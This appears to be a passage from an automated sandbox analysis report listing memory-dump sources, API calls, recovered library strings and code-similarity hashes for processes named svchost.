                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchr$strstr
                                                                                                                                                                                • String ID: %$%20$0123456789abcdef
                                                                                                                                                                                • API String ID: 1654209344-876311552
                                                                                                                                                                                • Opcode ID: 83239c9f20bb300e97965ad41614df556d87785220c98312023fd8e46a582e2b
                                                                                                                                                                                • Instruction ID: 3743e206953978a00ca004c95c981fd572b4e041273b32d6036170fc4636ae1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 83239c9f20bb300e97965ad41614df556d87785220c98312023fd8e46a582e2b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3941C281F0CA864DFE369A2D541037A2681AB4DBE4F9C0631DF5E46BC6DF6CE5474708
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FF8A7F91349
                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7F91621,?,?,?,00007FF8A7F7F667), ref: 00007FF8A7F91368
                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7F91621,?,?,?,00007FF8A7F7F667), ref: 00007FF8A7F9138A
                                                                                                                                                                                • sys_get_time.LIBCPMT ref: 00007FF8A7F913A5
                                                                                                                                                                                • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7F91621,?,?,?,00007FF8A7F7F667), ref: 00007FF8A7F913CB
                                                                                                                                                                                • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7F91621,?,?,?,00007FF8A7F7F667), ref: 00007FF8A7F913E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 184115430-0
                                                                                                                                                                                • Opcode ID: c2a558ad426cd182b6ed132adc34c7c0a06a3a703d8da2e6ab95142ab52ce039
                                                                                                                                                                                • Instruction ID: 7dc14582b046444ba3c8bed5cfd71e5ba8bad49e2ef5636204840dfefda7a1b8
                                                                                                                                                                                • Opcode Fuzzy Hash: c2a558ad426cd182b6ed132adc34c7c0a06a3a703d8da2e6ab95142ab52ce039
                                                                                                                                                                                • Instruction Fuzzy Hash: 43412B36A1EE02A6EB648F35E44063D73B0EB15BC4F404435D74D46A98EF3DEA95EB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                                                                • Opcode ID: e19bd80f26ea5fdc63f47b1ea33d2a27b6cb4991ade8fcf32786f70a8a8e3d53
                                                                                                                                                                                • Instruction ID: ca62aa090dcbf0f1510c5dc1e2e86d1e409646432ea216b840530d6839bb5967
                                                                                                                                                                                • Opcode Fuzzy Hash: e19bd80f26ea5fdc63f47b1ea33d2a27b6cb4991ade8fcf32786f70a8a8e3d53
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D315E22A0EA42A5FF219F25E44056D63A0FB88BE4F580631DE5D477A5EF3CE642E710
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: attempt to borrow xfer_ulbuf when already borrowed$could not allocate xfer_ulbuf of %zu bytes$transfer has no multi handle$transfer upload buffer size is 0
                                                                                                                                                                                • API String ID: 0-290960075
                                                                                                                                                                                • Opcode ID: b7d939488c5761826f306c3ded32f12878674f60ae358c4c8c0fbdeb25c34f04
                                                                                                                                                                                • Instruction ID: f2dd08f00cf594c929a20087f0776c317da39e9c8d0edd8d121d5f3344868891
                                                                                                                                                                                • Opcode Fuzzy Hash: b7d939488c5761826f306c3ded32f12878674f60ae358c4c8c0fbdeb25c34f04
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C41F836609B8185DB908F19E8843A937A0EB9CFC4F1C8036DF8E4B354DF79E4968708
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_vsnwprintfmemcpywcschr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1058213626-0
                                                                                                                                                                                • Opcode ID: ff6fad4c833719cb0e07a9023827865d875ff651630cd3a060bd56943facb6f4
                                                                                                                                                                                • Instruction ID: 3f2296d8db74d968cc61e6d4f80ecfc3a21ac720ff4b09df08dd94e69643891b
                                                                                                                                                                                • Opcode Fuzzy Hash: ff6fad4c833719cb0e07a9023827865d875ff651630cd3a060bd56943facb6f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D11D56770568988ED058F6BE9002999350AB88BF9FC846359F6D47BE4EE7CC4DA8300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$CertCloseStore
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 899430957-0
                                                                                                                                                                                • Opcode ID: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                                                                • Instruction ID: d7804f0c6944a41c3a5ef170d09d779f3c02b130f83745e4ac7bf35a526e3651
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                                                                • Instruction Fuzzy Hash: AB310536609F818AEB548F6AE99013833A4FB88F94F0C1124CB4E03B19CF3DE496C758
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00007FF8A7FAF45F
                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF8A7FAF47E
                                                                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF8A7FAF4A7
                                                                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF8A7FAF4B8
                                                                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF8A7FAF4C9
                                                                                                                                                                                  • Part of subcall function 00007FF8A7FAF080: HeapFree.KERNEL32(?,?,17F8342583480000,00007FF8A7FBC4FA,?,?,?,00007FF8A7FBC877,?,?,00000000,00007FF8A7FBB621,?,?,00007FF8A7FAED4A,00007FF8A7FBB553), ref: 00007FF8A7FAF096
                                                                                                                                                                                  • Part of subcall function 00007FF8A7FAF080: GetLastError.KERNEL32(?,?,17F8342583480000,00007FF8A7FBC4FA,?,?,?,00007FF8A7FBC877,?,?,00000000,00007FF8A7FBB621,?,?,00007FF8A7FAED4A,00007FF8A7FBB553), ref: 00007FF8A7FAF0A0
                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF8A7FAF4EC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 365477584-0
                                                                                                                                                                                • Opcode ID: 162ebc005b0bcca8f0dbda5aa180e1577cb88165657ed31e15eafbf72a61cf05
                                                                                                                                                                                • Instruction ID: 55f561c0b45f4022bbcd6aed28ed3568977fbea3c1a16798d6e4c1fddfcd5d5a
                                                                                                                                                                                • Opcode Fuzzy Hash: 162ebc005b0bcca8f0dbda5aa180e1577cb88165657ed31e15eafbf72a61cf05
                                                                                                                                                                                • Instruction Fuzzy Hash: 05110A24E0F24362FA64AF35A85157E22D2EF887E0F544535E95E4A2C7DE2CFA01E340
                                                                                                                                                                                APIs
                                                                                                                                                                                • pthread_mutexattr_init.LIBWINPTHREAD-1 ref: 68285DC2
                                                                                                                                                                                • pthread_mutexattr_settype.LIBWINPTHREAD-1 ref: 68285DE8
                                                                                                                                                                                • pthread_mutex_init.LIBWINPTHREAD-1 ref: 68285DFA
                                                                                                                                                                                • pthread_mutexattr_destroy.LIBWINPTHREAD-1 ref: 68285E09
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: pthread_mutex_initpthread_mutexattr_destroypthread_mutexattr_initpthread_mutexattr_settype
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3045616983-0
                                                                                                                                                                                • Opcode ID: 30fdcc7eac7baab35a635dcd2ae8769bd41f1f5ce2e5b37ad019a28fda06dcd5
                                                                                                                                                                                • Instruction ID: af2adbcbe8b8ebdd27bc45541cf758786fc65d9683058138e7abc058df1f117a
                                                                                                                                                                                • Opcode Fuzzy Hash: 30fdcc7eac7baab35a635dcd2ae8769bd41f1f5ce2e5b37ad019a28fda06dcd5
                                                                                                                                                                                • Instruction Fuzzy Hash: 42F0A46571812197FB095B69FD5876982919B48FF1F805230DD17837A4EF2C89DF8310
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freeinet_pton$_time64
                                                                                                                                                                                • String ID: includesubdomains$max-age=
                                                                                                                                                                                • API String ID: 2098200558-1235841791
                                                                                                                                                                                • Opcode ID: ed6b055b6c80e70cbd786afe7b0ee1ecf14a12651c0c1da9073e45a533259b5f
                                                                                                                                                                                • Instruction ID: 67186f718fa8fb880b256de02cd6e6cba208ed4b9ca5d288379a7f1d2c3fddd6
                                                                                                                                                                                • Opcode Fuzzy Hash: ed6b055b6c80e70cbd786afe7b0ee1ecf14a12651c0c1da9073e45a533259b5f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0051B312A0C65346FA614B2EA4903B966D1AF0DBD5F9C4032EF9D4B2D7EF2CD4478718
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID: SSL shutdown timeout$select/poll on SSL socket, errno: %d$shutdown and remove SSL, done -> %d$shutdown and remove SSL, start
                                                                                                                                                                                • API String ID: 1452528299-2396177677
                                                                                                                                                                                • Opcode ID: b47bc8b97bd60320225c103ee3fe139857a769aa37e5c85d561be794e429dea7
                                                                                                                                                                                • Instruction ID: e03e5c9593faaa407b507da144a64b1b0b2bb9222c4399756eae63a546bc9c3b
                                                                                                                                                                                • Opcode Fuzzy Hash: b47bc8b97bd60320225c103ee3fe139857a769aa37e5c85d561be794e429dea7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2451A222A0C79296EA919B19A5507BB7BA1FB49BC0F4C4031DF8D077A5CF3CE456CB48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupfree
                                                                                                                                                                                • String ID: Forcing HTTP/1.1 for NTLM$The requested URL returned error: %d
                                                                                                                                                                                • API String ID: 1865132094-1204028548
                                                                                                                                                                                • Opcode ID: a8a2d954995b111ab4511556eb97a916526fe070a320060053493b52aa9477a2
                                                                                                                                                                                • Instruction ID: 99bd6b1eba2afb1518aadbb7e3067373701769cdb3755f937d66a42d6732b65b
                                                                                                                                                                                • Opcode Fuzzy Hash: a8a2d954995b111ab4511556eb97a916526fe070a320060053493b52aa9477a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 58515331A0CA82C1FB618B2D94403FD66A2EB49BC8F5C0035DF5D4B69ADF6CE5478768
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %*.*s$%-*.*s$%.*s
                                                                                                                                                                                • API String ID: 0-4054516066
                                                                                                                                                                                • Opcode ID: f37a4b13f601adad2c318a366788739cb809b73a2b9c284b70806ab9fa0e07ec
                                                                                                                                                                                • Instruction ID: 14c994ba00cecd83a3ce85172a1a3791905054a8d8698d4d9af21e5054b0392a
                                                                                                                                                                                • Opcode Fuzzy Hash: f37a4b13f601adad2c318a366788739cb809b73a2b9c284b70806ab9fa0e07ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 7841D17365825E8AEF509F2BD41476E77A1E340BADF84C129CF688B648E779C542CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                • API String ID: 2967684691-1405518554
                                                                                                                                                                                • Opcode ID: 473f6c4334d09e492bed85f8e38d71faaa6e18f4f3156b6910a5b0d848cf99e8
                                                                                                                                                                                • Instruction ID: a39b9dd7fc873bde3658f4d6b619872546ed1e53ee0536763887e051f3f848ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 473f6c4334d09e492bed85f8e38d71faaa6e18f4f3156b6910a5b0d848cf99e8
                                                                                                                                                                                • Instruction Fuzzy Hash: 63418F22B0AB42A9FB14DF70D4506BD33A4EF44788F044439DE4E66A99EF38D756E340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_closemalloc
                                                                                                                                                                                • String ID: Couldn't open file %s
                                                                                                                                                                                • API String ID: 1839901052-447283422
